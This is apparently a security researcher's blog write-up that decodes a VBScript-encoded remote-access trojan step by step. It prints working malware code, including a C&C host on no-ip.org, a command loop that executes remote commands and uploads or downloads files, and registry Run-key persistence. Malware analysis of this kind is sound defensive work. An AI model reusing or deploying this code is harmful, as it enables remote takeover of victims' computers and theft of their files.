(Just in case you're wondering, this sample was detected by a custom HIPS rule looking for suspicious registry modifications. Would definitely recommend deploying custom HIPS rules if you haven't already!)
The malware was created using VBScript and saved as a .vbe file. It did a great job of evading AV with a score of only 4/46 on VirusTotal, props to CAT-QuickHeal/Avast/Kaspersky/TrendMicro for detecting it!
I assumed I would be able to just open the file and I'd see the malicious script. Well it wasn't quite that simple...Opening the .vbe all I got was a huge mass of characters:
After a quick Google I found out, VBE stands for VBScript Encoded, (ahhha moment!) and I needed some way to decode the file. Luckily there was a great blog post with sample script here:
Running the decode script against the encoded vbe we get some clear-text vbs.
Hmmm another chunk of encoded text. It does appear to be sent to a function called deCrypt though and looking down the script we come to the actual deCrypt function.
The decrypt function calls decodeBase64 which coverts our data from Base64 to ASCII. Also note that the decrypt routine is ran twice (once in each screenshot) before finally being executed. Now we could write a decode script or we could just use an online converter (http://www.hcidata.info/base64.htm):
Decoding Once (Still garbled...)
Decoding Twice (Woohoo code!)
So we have a variable....but also more encoded text. Scrolling down we come to the decryption routine:
Decryption removes the |dz| padding then for each item in the array concatenates to the previous item the ascii character for that character code. And then executes the final string. To get the plain text script I just patched the existing script to output to file instead of execute.
And finally we get to the actual VBScript:
'<[ recoder : houdini (c) skype : houdini-fx ]> '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= host = "zoia.no-ip.org" port = 446 installdir = "%appdata%" lnkfile = true lnkfolder = true '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-= dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj set filesystemobj = createobject("scripting.filesystemobject") dim httpobj set httpobj = createobject("msxml2.xmlhttp") '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-= installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\" (Continued below...)
Straight away you notice the author has proudly placed his name and Skype at the top of the script (queue Krebs style investigation!) Next there's the callback domain, where he's using the dynamic DNS service no-ip.org.
When run the script will repeatedly connect to the C&C and attempts to receive commands.
while true install response = "" response = post ("is-ready","") cmd = split (response,spliter) select case cmd (0) case "excecute" param = cmd (1) execute param case "update" param = cmd (1) oneonce.close set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false) oneonce.write param oneonce.close shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) wscript.quit case "uninstall" uninstall case "send" download cmd (1),cmd (2) case "recv" param = cmd (1) upload (param) case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param) case "delete" param = cmd (1) deletefaf (param) case "exit-process" param = cmd (1) exitprocess (param) case "sleep" param = cmd (1) sleep = eval (param) end select wscript.sleep sleep wend
Looking at the install routine we can see the script will create run keys and a copy of itself in the startup folder to maintain persistence.
sub upstart () on error resume Next shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true end sub
The script contains multiple functions the C&C owner can call upon. For example to install/uninstall, download/upload files, enumerate/kill processes, run arbitrary commands and spread using lnk files. As I had an infected machine I modified the original script to create a cleaner script that would call the uninstall function.
The malware appears to be quite recent as Googling the plain text script I could see only one post about it. The below link also has a copy of the whole script:
Manual binary analysis can be tricky so I normally let Cuckoo (http://www.cuckoosandbox.org/) do all the hard work but until Cuckoo supports VBScript manual analysis seems to be the only option.
Hope you guys found this useful.